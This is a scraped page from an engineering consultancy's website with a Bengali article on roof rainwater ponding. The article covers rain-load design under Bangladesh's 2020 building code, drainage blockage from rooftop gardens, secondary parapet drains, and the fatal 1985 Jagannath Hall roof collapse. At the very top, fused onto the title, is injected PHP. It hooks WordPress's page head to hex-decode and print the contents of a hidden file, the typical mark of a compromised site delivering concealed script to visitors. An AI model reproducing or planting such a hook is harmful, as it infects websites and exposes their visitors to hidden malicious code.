if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } বিল্ডিংয়ের ছাদে পানি জমার ঝুঁকি – Jaher Design & Consultancy (JDC)

বিল্ডিংয়ের ছাদে পানি জমার ঝুঁকি

 
বিল্ডিংয়ের ছাদের স্ট্রাকচারাল ডিজাইনে সাধারনত বৃষ্টির পানির জন্য আলাদা করে লোড ধরা হয়না। তবে বাংলাদেশ ন্যাশনাল বিল্ডিং কোড ২০২০ অনুযায়ী, রেইন ওয়াটার লোডের জন্য ছাদের ডিজাইন করা উচিত। এবং পানি জমে কোন ধরনের পন্ডিং ইন্সটাবিলিটি ডেভেলপ করে কিনা তা চেক করা উচিত।
 
তাছাড়া এখন বিল্ডিংয়ের ছাদে ছাদকৃষির প্রচলন আছে। এক্ষেত্রে খেয়াল রাখতে হবে কোনভাবে যেন ছাদের ড্রেনেজ সিস্টেম ব্লকড না হয়ে যায়।
 
ইন্টারন্যাশনাল বিল্ডিং কোডেও রেইন লোড ক্যালকুলেশনের নির্দেশনা আছে।
 
বিল্ডিংয়ের ছাদে যাতে পানি না জমে তার জন্য ড্রেইনেজ সিস্টেম ডিজাইন করা হয়। কিন্তু এটা কোন ধরনের ডাস্ট জমে বন্ধ হয়ে যেতে পারে। তাই প্যারাপেট ওয়ালে সেকেন্ডারী ড্রেনেজ সিস্টেম ব্যবহার করতে পারলে ভালো।
 
প্রায় ৩৬ বছর আগে, ১৯৮৫ সালের ১৫ই অক্টোবর ঢাকা বিশ্ববিদ্যালয়ের জগন্নাথ হলের একটি হলরুমের ছাদে বৃষ্টির পানি জমে ছাদ ধসে পড়ে মারা গিয়েছিলেন ৪০ জন ছাত্র ছাত্রী ও হলের অন্যান্য কর্মচারী-কর্মকর্তা । ওই ছাদের ড্রেনেজ সিস্টেম ব্লকড হয়ে গিয়েছিল।
 
অনেক সময় নিরীহ বৃষ্টির পানিও অনেক ভয়ংকর বিপদ ডেকে আনতে পারে।


Leave a Reply